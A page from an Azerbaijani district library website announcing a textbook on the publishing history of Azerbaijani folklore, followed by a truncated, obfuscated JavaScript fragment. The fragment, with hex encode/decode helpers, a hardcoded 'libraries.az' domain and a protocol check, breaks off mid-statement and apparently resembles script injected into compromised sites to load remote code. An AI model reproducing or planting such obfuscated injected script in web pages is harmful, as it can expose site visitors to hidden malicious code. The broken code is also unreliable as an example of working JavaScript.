Zəngilan rayon Mərkəzi kitabxanası

Zəngilan rayon MKS

Yeni kitablar
Azərbaycan folklorunun nəşr tarixi problemləri.
7 Dekabr , 2015

   Təqdim olunan dərslik- Azərbaycan kitab mədəniyyətinin mühüm bir istiqaməti olan folklor kitabının qaydaları, təşəkkülü posesinin tədrisinə həsr olunmuşdur. Burada ilkin- ibtidai yazıyaalınmalarda bəsit şəkildə təzahür edən, erkən orta əsərlərdən XIX əsrə qədər əliyazma kitab halında mövcud olan Azərbaycan folklor kitabının əsas tarixi-mədəni səciyyəsi və mühüm nümunələr üzərində dəyərləndirmələr aparılmışdır. XIX əsrin sonlarından çap kitabına keçidlə əlaqədar fərdi təşəbbüs və elmi-təşkilati fəaliyyəti formasında həyata keçirilən Azərbaycan folklor kitabının əsas istiqaməti və mərhələləri, ən mühüm nəçrlərin səciyyəvi xüsusiyyətləri və s. bu kimi çoxsaylı elmi problemlər əsərin əsas məğzini təşkil edir. Azərbaycan folklor kitabının müasir vəziyyəti  və inkişafı perspektvlərinin  təhlilinə də dərslikdə geniş yer verilmişdir. Dərslik  ADMİU-nun  “Nəşriyyat işi redaktəetmə” ixtisasının magistr pilləsində təhsil alan tələbələr və folklorşünaslığın tədqiqi ilə məşğul olan mütəxəssislər üçün nəzərdə tutulur.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "libraries.az"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e